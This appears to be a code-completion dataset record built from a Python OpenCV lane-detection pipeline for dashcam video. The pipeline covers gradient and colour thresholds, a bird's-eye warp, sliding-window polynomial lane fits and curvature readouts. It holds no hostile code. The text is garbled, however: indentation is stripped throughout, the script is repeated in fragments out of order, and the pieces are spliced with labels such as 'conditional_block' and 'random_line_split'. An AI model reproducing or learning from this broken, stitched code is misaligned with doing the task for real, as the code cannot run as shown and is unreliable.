def abs_sobel_thresh(img, orient='x', sobel_kernel=3, thresh=(0, 255)):
# Calculate directional gradient
# Apply threshold
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
if orient=='x':
sobel = cv2.Sobel(gray,cv2.CV_64F,1,0,ksize=sobel_kernel)
else:
sobel = cv2.Sobel(gray,cv2.CV_64F,0,1,ksize=sobel_kernel)
absolute = np.absolute(sobel)
scaled = np.uint8(255*absolute/np.max(absolute))
grad_binary = np.zeros_like(scaled)
grad_binary[(scaled >= thresh[0])&(scaled <= thresh[1])] = 1
return grad_binary
def mag_thresh(image, sobel_kernel=3, mag_thresh=(0, 255)):
# Calculate gradient magnitude
# Apply threshold
gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
mag_sobel = np.sqrt((sobelx)**2 + (sobely)**2)
absolute = np.absolute(mag_sobel)
scaled = np.uint8(255*absolute/np.max(absolute))
mag_binary = np.zeros_like(scaled)
mag_binary[(scaled >= mag_thresh[0])&(scaled <= mag_thresh[1])] = 1
return mag_binary
def dir_threshold(image, sobel_kernel=3, thresh=(0, np.pi/2)):
# Calculate gradient direction
# Apply threshold
gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
absx = np.absolute(sobelx)
absy = np.absolute(sobely)
direction = np.arctan2(absy,absx)
dir_binary = np.zeros_like(gray_img)
dir_binary[(direction >= thresh[0])&(direction <= thresh[1])] = 1
return dir_binary
def hls_select(image,thresh=(0,255)):
hls = cv2.cvtColor(image,cv2.COLOR_BGR2HLS)
s = hls[:,:,2]
binary_output = np.zeros_like(s)
binary_output[(s>thresh[0])&(s<=thresh[1])]=1
return binary_output
def equalize(image):
image_yuv = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#image_yuv[:,:,0] = cv2.equalizeHist(image_yuv[:,:,0])
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#plt.plot(histo)
#plt.show()
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(20,20))
image_yuv[:,:,0] = clahe.apply(image_yuv[:,:,0])
img_output = cv2.cvtColor(image_yuv, cv2.COLOR_YUV2BGR)
return img_output
def yuv_select_lumin(image,thresh=(0,255)):
yuv_img = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
lumin = yuv_img[:,:,0]
binary_output = np.zeros_like(lumin)
binary_output[(lumin>thresh[0])&(lumin<=thresh[1])]=1
return binary_output
def hist(img,left_fit1,right_fit1,win=True):
#img = img[:,:,0]/255
img = img/255
img = np.expand_dims(img,axis=-1)
bottom_half = img[img.shape[0]//2:,:]
histogram = np.sum(bottom_half,axis=0)
# out = np.arange(600)
# out1 = np.arange(600,-1,-1)
# out3=np.zeros(79)
# out2=np.concatenate((out, out1, out3))
# out3 = np.expand_dims(out2,axis=1)
histogram = np.multiply(histogram,fin)
#print(img.shape)
out_img = np.dstack((img,img,img))
#print(out_img.shape)
#print(histogram.shape)
midpoint = np.int(histogram.shape[0]//2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:])+midpoint
nwindows = 9
margin = 100
minpix =50
searchmargin = 100
window_height = np.int(img.shape[0]//nwindows)
nonzero = img.nonzero()
#**Beware y and then x**
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
leftx_current = leftx_base
rightx_current = rightx_base
left_lane_ids=[]
right_lane_ids=[]
if win:
for window in range(nwindows):
win_y_low = img.shape[0] - (window+1)*window_height
win_y_high = img.shape[0] - (window)*window_height
win_xleft_low = leftx_current - margin
win_xleft_high =leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
cv2.rectangle(out_img,(win_xleft_low,win_y_low),(win_xleft_high,win_y_high),(0,255,0),2)
cv2.rectangle(out_img,(win_xright_low,win_y_low),(win_xright_high,win_y_high),(0,255,0),2)
good_left_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) &(nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) &(nonzerox < win_xright_high)).nonzero()[0]
left_lane_ids.append(good_left_inds)
right_lane_ids.append(good_right_inds)
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
try:
left_lane_ids = np.concatenate(left_lane_ids)
right_lane_ids = np.concatenate(right_lane_ids)
except ValueError:
pass
else:
left_lane_ids = ((nonzerox > (left_fit1[0]*(nonzeroy**2) + left_fit1[1]*nonzeroy +
left_fit1[2] - searchmargin)) & (nonzerox < (left_fit1[0]*(nonzeroy**2) +
left_fit1[1]*nonzeroy + left_fit1[2] + searchmargin)))
right_lane_ids = ((nonzerox > (right_fit1[0]*(nonzeroy**2) + right_fit1[1]*nonzeroy +
right_fit1[2] - searchmargin)) & (nonzerox < (right_fit1[0]*(nonzeroy**2) +
right_fit1[1]*nonzeroy + right_fit1[2] + searchmargin)))
leftx = nonzerox[left_lane_ids]
lefty = nonzeroy[left_lane_ids]
rightx = nonzerox[right_lane_ids]
righty = nonzeroy[right_lane_ids]
return histogram,leftx,lefty,rightx,righty,out_img
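# hist() is used in two modes below: with win=True it seeds a fresh 9-window sliding search from
# the weighted histogram peaks; with win=False it reuses the previous polynomial fits
# (left_fit1/right_fit1) and just collects the nonzero pixels within +/- searchmargin of those
# curves.  The returned (leftx, lefty) and (rightx, righty) coordinates are what np.polyfit
# consumes to produce the next left_fit / right_fit.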
cap = cv2.VideoCapture('./project_video.mp4')
#cap.set(cv2.CAP_PROP_POS_FRAMES, 1000)
size=(int(cap.get(3)),int(cap.get(4)))
result1 = cv2.VideoWriter('./output_images/project_video.mp4',
cv2.VideoWriter_fourcc(*'MJPG'),
10, size)
#cap = cv2.VideoCapture('./challenge_video.mp4')
left_fit = []
right_fit =[]
prev_left_fit=[]
prev_right_fit=[]
count=0
radoffset=150
prev_left_fit=[]
prev_right_fit=[]
width=0
validation_fails=0
#image_no=0
while(True):
|
cap.release()
result1.release()
cv2.destroyAllWindows() | count+=1
ret, image = cap.read()
dist_pickle = pickle.load(open('./camera_cal/matrix.p','rb'))
dst = dist_pickle["dist"]
mtx = dist_pickle["mtx"]
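    # matrix.p is assumed to hold the camera matrix under "mtx" and the distortion coefficients
    # under "dist", produced by a separate calibration step (e.g. cv2.findChessboardCorners +
    # cv2.calibrateCamera over the images in camera_cal/).  Loading it once before the loop would
    # also avoid re-reading the pickle on every frame.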
if ret:
ksize = 3
img_undist = cv2.undistort(image,mtx,dst,None,mtx)
final_img = np.copy(img_undist)
#final_img = equalize(final_img)
#cv2.imwrite('D:/Self Driving Car Engineer/Course 4/SampleImages/'+str(image_no)+'.jpg',final_img)
#image_no+=1
gradx = abs_sobel_thresh(img_undist, orient='x', sobel_kernel=ksize, thresh=(52, 238))
grady = abs_sobel_thresh(img_undist, orient='y', sobel_kernel=ksize, thresh=(59, 249))
mag_binary = mag_thresh(img_undist, sobel_kernel=ksize, mag_thresh=(68, 255))
dir_binary = dir_threshold(img_undist, sobel_kernel=ksize, thresh=(0.02, 1.57))
#s_binary = hls_select(img_undist,thresh=(212,255)) #98-255 works even in brighter areas
s_binary = hls_select(img_undist,thresh=(151,255)) #151
luminiscence = yuv_select_lumin(img_undist,thresh=(14,255))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1)) |(s_binary == 1)&(luminiscence==1)] = 1
#top left,bottom left,bottom right,top right
src = np.float32([[585-20, 460+10],[203-20, 720],[1127+30, 720],[695+30, 460+10]])
#src = np.float32([[620, 460-30],[203, 720],[1127, 720],[660, 460-30]])
points = np.int32(np.copy(src))
# cv2.polylines(img_undist,[points] ,True,(0,0,255),5)
#** Key here is keep the destination top boundary as closer as possible for effective transform**
dst = np.array([[320-20, 0],[320-20, 720],[960+30, 720],[960+30, 0]],dtype='float32')
img_size=(combined.shape[1],combined.shape[0])
M = cv2.getPerspectiveTransform(src,dst)
Minv = cv2.getPerspectiveTransform(dst,src)
warped = cv2.warpPerspective(combined,M,img_size,flags=cv2.INTER_LINEAR)
#Testing
output4 = np.dstack([warped*255,warped*255,warped*255])
output4 = cv2.resize(output4,(320, 180), interpolation = cv2.INTER_AREA)
#Testing ends
output3 = cv2.warpPerspective(final_img,M,img_size,flags=cv2.INTER_LINEAR)
output3 = cv2.resize(output3,(320, 180), interpolation = cv2.INTER_AREA)
#Testing
#cv2.imshow('warped',warped*255)
kernel = np.ones((320, 1),np.uint8)
warped1 = cv2.morphologyEx(warped.astype(np.uint8), cv2.MORPH_DILATE, kernel, iterations = 1)
warped = cv2.morphologyEx(warped1.astype(np.uint8), cv2.MORPH_ERODE, kernel, iterations = 1)
#cv2.imshow('warped1',warped*255)
#Testing ends
if((len(left_fit)==0 or len(right_fit)==0) or count==100 or validation_fails>5):
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,True)
count=0
validation_fails = 0
else:
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,False)
if(len(leftx)==0 or len(rightx)==0):
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,True)
count=0
ploty = np.linspace(0,warped.shape[0]-1,warped.shape[0])
left_fit = np.polyfit(lefty,leftx,2)
right_fit = np.polyfit(righty,rightx,2)
#Testing
t2 = right_fit[2]/left_fit[2]
t1 = right_fit[1]/left_fit[1]
t0 = right_fit[0]/left_fit[0]
#print(t2,t1,t0)
if(abs(t2) >20 or abs(t1)>20 or abs(t0)>20):
validation_fails+=1
if(len(prev_left_fit)!=0):
left_fit = prev_left_fit
if(len(prev_right_fit)!=0):
right_fit = prev_right_fit
print('valid fails')
prev_left_fit = np.copy(left_fit)
prev_right_fit = np.copy(right_fit)
#Testing ends
try:
leftfitx = left_fit[0]*ploty**2 + left_fit[1]*ploty+left_fit[2]
rightfitx = right_fit[0]*ploty**2+right_fit[1]*ploty+right_fit[2]
except TypeError:
print('The function failed to fit a line!')
final_out_img = np.copy(out_img).astype(np.uint8)
#testing
out_img[lefty,leftx] = [255,0,0]
out_img[righty,rightx] = [0,0,255]
#output4 = cv2.resize(out_img,(320, 180), interpolation = cv2.INTER_AREA)
#testing ends
leftpoints_draw = (np.asarray([leftfitx,ploty]).T).astype(np.int32)
rightpoints_draw = (np.asarray([rightfitx,ploty]).T).astype(np.int32)
#testing
# width = abs(np.max(leftpoints_draw) - np.max(rightpoints_draw))
# print(width)
cv2.polylines(out_img,[leftpoints_draw],False,(0,255,255),3)
cv2.polylines(out_img,[rightpoints_draw],False,(0,255,255),3)
#testing ends
        #**Drawing the detected lane area back onto the image**
pts_left = np.array([np.transpose(np.vstack([leftfitx, ploty]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([rightfitx, ploty])))])
        # flipud reverses the right-lane points from top-to-bottom to bottom-to-top so that the combined polygon corners are ordered anticlockwise.
pts = np.hstack((pts_left, pts_right))
#print(pts.shape)
#Testing
left_side_points_mean = np.mean(pts_left)
right_side_points_mean = np.mean(pts_right)
#Testing ends
#**Measuring Curvature radius**
y_eval = np.max(ploty)
ym_per_pixel = 30/720 #meters per pixel in y dimension
xm_per_pixel = 3.7/700 #meters per pixel in x dimension
#Testing
left_fit_0_metres = left_fit[0] * (xm_per_pixel / (ym_per_pixel**2))
left_fit_1_metres = left_fit[1] * (xm_per_pixel / ym_per_pixel)
right_fit_0_metres = right_fit[0] * (xm_per_pixel / (ym_per_pixel**2))
right_fit_1_metres = right_fit[1] * (xm_per_pixel / ym_per_pixel)
#Testing ends
left_curved = ((1 + (2*left_fit_0_metres*y_eval*ym_per_pixel + left_fit_1_metres)**2)**1.5)/(np.absolute(2*left_fit_0_metres))
right_curved = ((1 + (2*right_fit_0_metres*y_eval*ym_per_pixel + right_fit_1_metres)**2)**1.5)/(np.absolute(2*right_fit_0_metres))
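        # For a fit x = A*y**2 + B*y + C the radius of curvature is
        #   R = (1 + (2*A*y + B)**2)**1.5 / abs(2*A)
        # evaluated at the bottom of the image (y_eval), with A and B rescaled from pixel units to
        # metres via xm_per_pixel and ym_per_pixel as above.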
#print('left_curved: '+str(left_curved))
#print('right_curved: '+str(right_curved))
#testing
output2 = cv2.resize(out_img,(320, 180), interpolation = cv2.INTER_AREA)
#testing ends
cv2.fillPoly(final_out_img,np.int_([pts]),(0,255,0))
#cv2.imwrite('./test_images/test.jpg',combined*255)
newwarp = cv2.warpPerspective(final_out_img, Minv, (image.shape[1], image.shape[0]))
result = cv2.addWeighted(final_img, 1, newwarp, 0.3, 0)
vis = np.zeros((720, 1280 ,3),dtype=np.uint8)
vis[:720, :1280,:] = result
ltext = "left Curvature(m): " + str(round(left_curved,3))
rtext = "right Curvature(m): " + str(round(right_curved,3))
cent_out = round((left_side_points_mean + right_side_points_mean)/2,3)
distance_from_center = round(abs(img_size[0]/2 - cent_out)*xm_per_pixel,3)
cent = "Vehicle is left from center(m): " + str(distance_from_center)
cv2.putText(result,ltext,(200,100),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(result,rtext,(750,100),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(result,cent,(350,200),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
#cv2.imshow('result',result)
output1 = cv2.resize(combined*255,(320, 180), interpolation = cv2.INTER_AREA)
vis[:180, 0:320,:] = np.dstack([output1,output1,output1])
vis[:180, 320:640,:] = output2
vis[:180, 640:960,:] = output3
vis[:180, 960:1280,:] = output4
cv2.putText(vis,ltext,(200,210),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(vis,rtext,(750,210),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(vis,cent,(350,250),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.imshow('result',vis)
result1.write(result)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break | conditional_block |
Pipeline_for_videos.py | # -*- coding: utf-8 -*-
"""
Created on Wed Nov 11 09:43:43 2020
@author: Admin
"""
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import cv2
import pickle
from moviepy.editor import *
fin=[]
out = np.arange(0,250)/250
#print(out.shape)
out1= np.ones(100)
#print(out1.shape)
out2=np.arange(400,350,-1)/400
#print(out2.shape)
out3=np.zeros(400)
#print(out3.shape)
out4=np.arange(800,850,1)/850
#print(out4.shape)
out5=np.ones(100)
#print(out5.shape)
out6 = np.arange(1100,950,-1)/1100
out7=np.zeros(180)
fin = np.concatenate((out, out1, out2,out3,out4,out5,out6,out7))
fin = np.expand_dims(fin,axis=1)
def abs_sobel_thresh(img, orient='x', sobel_kernel=3, thresh=(0, 255)):
# Calculate directional gradient
# Apply threshold
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
if orient=='x':
sobel = cv2.Sobel(gray,cv2.CV_64F,1,0,ksize=sobel_kernel)
else:
sobel = cv2.Sobel(gray,cv2.CV_64F,0,1,ksize=sobel_kernel)
absolute = np.absolute(sobel)
scaled = np.uint8(255*absolute/np.max(absolute))
grad_binary = np.zeros_like(scaled)
grad_binary[(scaled >= thresh[0])&(scaled <= thresh[1])] = 1
return grad_binary
def mag_thresh(image, sobel_kernel=3, mag_thresh=(0, 255)):
# Calculate gradient magnitude
# Apply threshold
gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
mag_sobel = np.sqrt((sobelx)**2 + (sobely)**2)
absolute = np.absolute(mag_sobel)
scaled = np.uint8(255*absolute/np.max(absolute))
mag_binary = np.zeros_like(scaled)
mag_binary[(scaled >= mag_thresh[0])&(scaled <= mag_thresh[1])] = 1
return mag_binary
def dir_threshold(image, sobel_kernel=3, thresh=(0, np.pi/2)):
# Calculate gradient direction
# Apply threshold
gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
absx = np.absolute(sobelx)
absy = np.absolute(sobely)
direction = np.arctan2(absy,absx)
dir_binary = np.zeros_like(gray_img)
dir_binary[(direction >= thresh[0])&(direction <= thresh[1])] = 1
return dir_binary
def hls_select(image,thresh=(0,255)):
hls = cv2.cvtColor(image,cv2.COLOR_BGR2HLS)
s = hls[:,:,2]
binary_output = np.zeros_like(s)
binary_output[(s>thresh[0])&(s<=thresh[1])]=1
return binary_output
def equalize(image):
image_yuv = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#image_yuv[:,:,0] = cv2.equalizeHist(image_yuv[:,:,0])
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#plt.plot(histo)
| #plt.show()
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(20,20))
image_yuv[:,:,0] = clahe.apply(image_yuv[:,:,0])
img_output = cv2.cvtColor(image_yuv, cv2.COLOR_YUV2BGR)
return img_output
def yuv_select_lumin(image,thresh=(0,255)):
yuv_img = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
lumin = yuv_img[:,:,0]
binary_output = np.zeros_like(lumin)
binary_output[(lumin>thresh[0])&(lumin<=thresh[1])]=1
return binary_output
def hist(img,left_fit1,right_fit1,win=True):
#img = img[:,:,0]/255
img = img/255
img = np.expand_dims(img,axis=-1)
bottom_half = img[img.shape[0]//2:,:]
histogram = np.sum(bottom_half,axis=0)
# out = np.arange(600)
# out1 = np.arange(600,-1,-1)
# out3=np.zeros(79)
# out2=np.concatenate((out, out1, out3))
# out3 = np.expand_dims(out2,axis=1)
histogram = np.multiply(histogram,fin)
#print(img.shape)
out_img = np.dstack((img,img,img))
#print(out_img.shape)
#print(histogram.shape)
midpoint = np.int(histogram.shape[0]//2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:])+midpoint
nwindows = 9
margin = 100
minpix =50
searchmargin = 100
window_height = np.int(img.shape[0]//nwindows)
nonzero = img.nonzero()
#**Beware y and then x**
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
leftx_current = leftx_base
rightx_current = rightx_base
left_lane_ids=[]
right_lane_ids=[]
if win:
for window in range(nwindows):
win_y_low = img.shape[0] - (window+1)*window_height
win_y_high = img.shape[0] - (window)*window_height
win_xleft_low = leftx_current - margin
win_xleft_high =leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
cv2.rectangle(out_img,(win_xleft_low,win_y_low),(win_xleft_high,win_y_high),(0,255,0),2)
cv2.rectangle(out_img,(win_xright_low,win_y_low),(win_xright_high,win_y_high),(0,255,0),2)
good_left_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) &(nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) &(nonzerox < win_xright_high)).nonzero()[0]
left_lane_ids.append(good_left_inds)
right_lane_ids.append(good_right_inds)
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
try:
left_lane_ids = np.concatenate(left_lane_ids)
right_lane_ids = np.concatenate(right_lane_ids)
except ValueError:
pass
else:
left_lane_ids = ((nonzerox > (left_fit1[0]*(nonzeroy**2) + left_fit1[1]*nonzeroy +
left_fit1[2] - searchmargin)) & (nonzerox < (left_fit1[0]*(nonzeroy**2) +
left_fit1[1]*nonzeroy + left_fit1[2] + searchmargin)))
right_lane_ids = ((nonzerox > (right_fit1[0]*(nonzeroy**2) + right_fit1[1]*nonzeroy +
right_fit1[2] - searchmargin)) & (nonzerox < (right_fit1[0]*(nonzeroy**2) +
right_fit1[1]*nonzeroy + right_fit1[2] + searchmargin)))
leftx = nonzerox[left_lane_ids]
lefty = nonzeroy[left_lane_ids]
rightx = nonzerox[right_lane_ids]
righty = nonzeroy[right_lane_ids]
return histogram,leftx,lefty,rightx,righty,out_img
cap = cv2.VideoCapture('./project_video.mp4')
#cap.set(cv2.CAP_PROP_POS_FRAMES, 1000)
size=(int(cap.get(3)),int(cap.get(4)))
result1 = cv2.VideoWriter('./output_images/project_video.mp4',
cv2.VideoWriter_fourcc(*'MJPG'),
10, size)
#cap = cv2.VideoCapture('./challenge_video.mp4')
left_fit = []
right_fit =[]
prev_left_fit=[]
prev_right_fit=[]
count=0
radoffset=150
prev_left_fit=[]
prev_right_fit=[]
width=0
validation_fails=0
#image_no=0
while(True):
count+=1
ret, image = cap.read()
dist_pickle = pickle.load(open('./camera_cal/matrix.p','rb'))
dst = dist_pickle["dist"]
mtx = dist_pickle["mtx"]
if ret:
ksize = 3
img_undist = cv2.undistort(image,mtx,dst,None,mtx)
final_img = np.copy(img_undist)
#final_img = equalize(final_img)
#cv2.imwrite('D:/Self Driving Car Engineer/Course 4/SampleImages/'+str(image_no)+'.jpg',final_img)
#image_no+=1
gradx = abs_sobel_thresh(img_undist, orient='x', sobel_kernel=ksize, thresh=(52, 238))
grady = abs_sobel_thresh(img_undist, orient='y', sobel_kernel=ksize, thresh=(59, 249))
mag_binary = mag_thresh(img_undist, sobel_kernel=ksize, mag_thresh=(68, 255))
dir_binary = dir_threshold(img_undist, sobel_kernel=ksize, thresh=(0.02, 1.57))
#s_binary = hls_select(img_undist,thresh=(212,255)) #98-255 works even in brighter areas
s_binary = hls_select(img_undist,thresh=(151,255)) #151
luminiscence = yuv_select_lumin(img_undist,thresh=(14,255))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1)) |(s_binary == 1)&(luminiscence==1)] = 1
#top left,bottom left,bottom right,top right
src = np.float32([[585-20, 460+10],[203-20, 720],[1127+30, 720],[695+30, 460+10]])
#src = np.float32([[620, 460-30],[203, 720],[1127, 720],[660, 460-30]])
points = np.int32(np.copy(src))
# cv2.polylines(img_undist,[points] ,True,(0,0,255),5)
#** Key here is keep the destination top boundary as closer as possible for effective transform**
dst = np.array([[320-20, 0],[320-20, 720],[960+30, 720],[960+30, 0]],dtype='float32')
img_size=(combined.shape[1],combined.shape[0])
M = cv2.getPerspectiveTransform(src,dst)
Minv = cv2.getPerspectiveTransform(dst,src)
warped = cv2.warpPerspective(combined,M,img_size,flags=cv2.INTER_LINEAR)
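        # The perspective transform maps the src trapezoid (roughly the lane area ahead of the car)
        # onto the rectangular dst region, giving a bird's-eye view in which the lane lines are
        # near-vertical; Minv is kept so the detected lane polygon can be warped back later.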
#Testing
output4 = np.dstack([warped*255,warped*255,warped*255])
output4 = cv2.resize(output4,(320, 180), interpolation = cv2.INTER_AREA)
#Testing ends
output3 = cv2.warpPerspective(final_img,M,img_size,flags=cv2.INTER_LINEAR)
output3 = cv2.resize(output3,(320, 180), interpolation = cv2.INTER_AREA)
#Testing
#cv2.imshow('warped',warped*255)
kernel = np.ones((320, 1),np.uint8)
warped1 = cv2.morphologyEx(warped.astype(np.uint8), cv2.MORPH_DILATE, kernel, iterations = 1)
warped = cv2.morphologyEx(warped1.astype(np.uint8), cv2.MORPH_ERODE, kernel, iterations = 1)
#cv2.imshow('warped1',warped*255)
#Testing ends
if((len(left_fit)==0 or len(right_fit)==0) or count==100 or validation_fails>5):
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,True)
count=0
validation_fails = 0
else:
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,False)
if(len(leftx)==0 or len(rightx)==0):
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,True)
count=0
ploty = np.linspace(0,warped.shape[0]-1,warped.shape[0])
left_fit = np.polyfit(lefty,leftx,2)
right_fit = np.polyfit(righty,rightx,2)
#Testing
t2 = right_fit[2]/left_fit[2]
t1 = right_fit[1]/left_fit[1]
t0 = right_fit[0]/left_fit[0]
#print(t2,t1,t0)
if(abs(t2) >20 or abs(t1)>20 or abs(t0)>20):
validation_fails+=1
if(len(prev_left_fit)!=0):
left_fit = prev_left_fit
if(len(prev_right_fit)!=0):
right_fit = prev_right_fit
print('valid fails')
prev_left_fit = np.copy(left_fit)
prev_right_fit = np.copy(right_fit)
#Testing ends
try:
leftfitx = left_fit[0]*ploty**2 + left_fit[1]*ploty+left_fit[2]
rightfitx = right_fit[0]*ploty**2+right_fit[1]*ploty+right_fit[2]
except TypeError:
print('The function failed to fit a line!')
final_out_img = np.copy(out_img).astype(np.uint8)
#testing
out_img[lefty,leftx] = [255,0,0]
out_img[righty,rightx] = [0,0,255]
#output4 = cv2.resize(out_img,(320, 180), interpolation = cv2.INTER_AREA)
#testing ends
leftpoints_draw = (np.asarray([leftfitx,ploty]).T).astype(np.int32)
rightpoints_draw = (np.asarray([rightfitx,ploty]).T).astype(np.int32)
#testing
# width = abs(np.max(leftpoints_draw) - np.max(rightpoints_draw))
# print(width)
cv2.polylines(out_img,[leftpoints_draw],False,(0,255,255),3)
cv2.polylines(out_img,[rightpoints_draw],False,(0,255,255),3)
#testing ends
        #**Drawing the detected lane area back onto the image**
pts_left = np.array([np.transpose(np.vstack([leftfitx, ploty]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([rightfitx, ploty])))])
        # flipud reverses the right-lane points from top-to-bottom to bottom-to-top so that the combined polygon corners are ordered anticlockwise.
pts = np.hstack((pts_left, pts_right))
#print(pts.shape)
#Testing
left_side_points_mean = np.mean(pts_left)
right_side_points_mean = np.mean(pts_right)
#Testing ends
#**Measuring Curvature radius**
y_eval = np.max(ploty)
ym_per_pixel = 30/720 #meters per pixel in y dimension
xm_per_pixel = 3.7/700 #meters per pixel in x dimension
#Testing
left_fit_0_metres = left_fit[0] * (xm_per_pixel / (ym_per_pixel**2))
left_fit_1_metres = left_fit[1] * (xm_per_pixel / ym_per_pixel)
right_fit_0_metres = right_fit[0] * (xm_per_pixel / (ym_per_pixel**2))
right_fit_1_metres = right_fit[1] * (xm_per_pixel / ym_per_pixel)
#Testing ends
left_curved = ((1 + (2*left_fit_0_metres*y_eval*ym_per_pixel + left_fit_1_metres)**2)**1.5)/(np.absolute(2*left_fit_0_metres))
right_curved = ((1 + (2*right_fit_0_metres*y_eval*ym_per_pixel + right_fit_1_metres)**2)**1.5)/(np.absolute(2*right_fit_0_metres))
#print('left_curved: '+str(left_curved))
#print('right_curved: '+str(right_curved))
#testing
output2 = cv2.resize(out_img,(320, 180), interpolation = cv2.INTER_AREA)
#testing ends
cv2.fillPoly(final_out_img,np.int_([pts]),(0,255,0))
#cv2.imwrite('./test_images/test.jpg',combined*255)
newwarp = cv2.warpPerspective(final_out_img, Minv, (image.shape[1], image.shape[0]))
result = cv2.addWeighted(final_img, 1, newwarp, 0.3, 0)
vis = np.zeros((720, 1280 ,3),dtype=np.uint8)
vis[:720, :1280,:] = result
ltext = "left Curvature(m): " + str(round(left_curved,3))
rtext = "right Curvature(m): " + str(round(right_curved,3))
cent_out = round((left_side_points_mean + right_side_points_mean)/2,3)
distance_from_center = round(abs(img_size[0]/2 - cent_out)*xm_per_pixel,3)
cent = "Vehicle is left from center(m): " + str(distance_from_center)
cv2.putText(result,ltext,(200,100),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(result,rtext,(750,100),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(result,cent,(350,200),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
#cv2.imshow('result',result)
output1 = cv2.resize(combined*255,(320, 180), interpolation = cv2.INTER_AREA)
vis[:180, 0:320,:] = np.dstack([output1,output1,output1])
vis[:180, 320:640,:] = output2
vis[:180, 640:960,:] = output3
vis[:180, 960:1280,:] = output4
cv2.putText(vis,ltext,(200,210),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(vis,rtext,(750,210),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(vis,cent,(350,250),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.imshow('result',vis)
result1.write(result)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
cap.release()
result1.release()
cv2.destroyAllWindows() | random_line_split |
|
Pipeline_for_videos.py | # -*- coding: utf-8 -*-
"""
Created on Wed Nov 11 09:43:43 2020
@author: Admin
"""
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import cv2
import pickle
from moviepy.editor import *
fin=[]
out = np.arange(0,250)/250
#print(out.shape)
out1= np.ones(100)
#print(out1.shape)
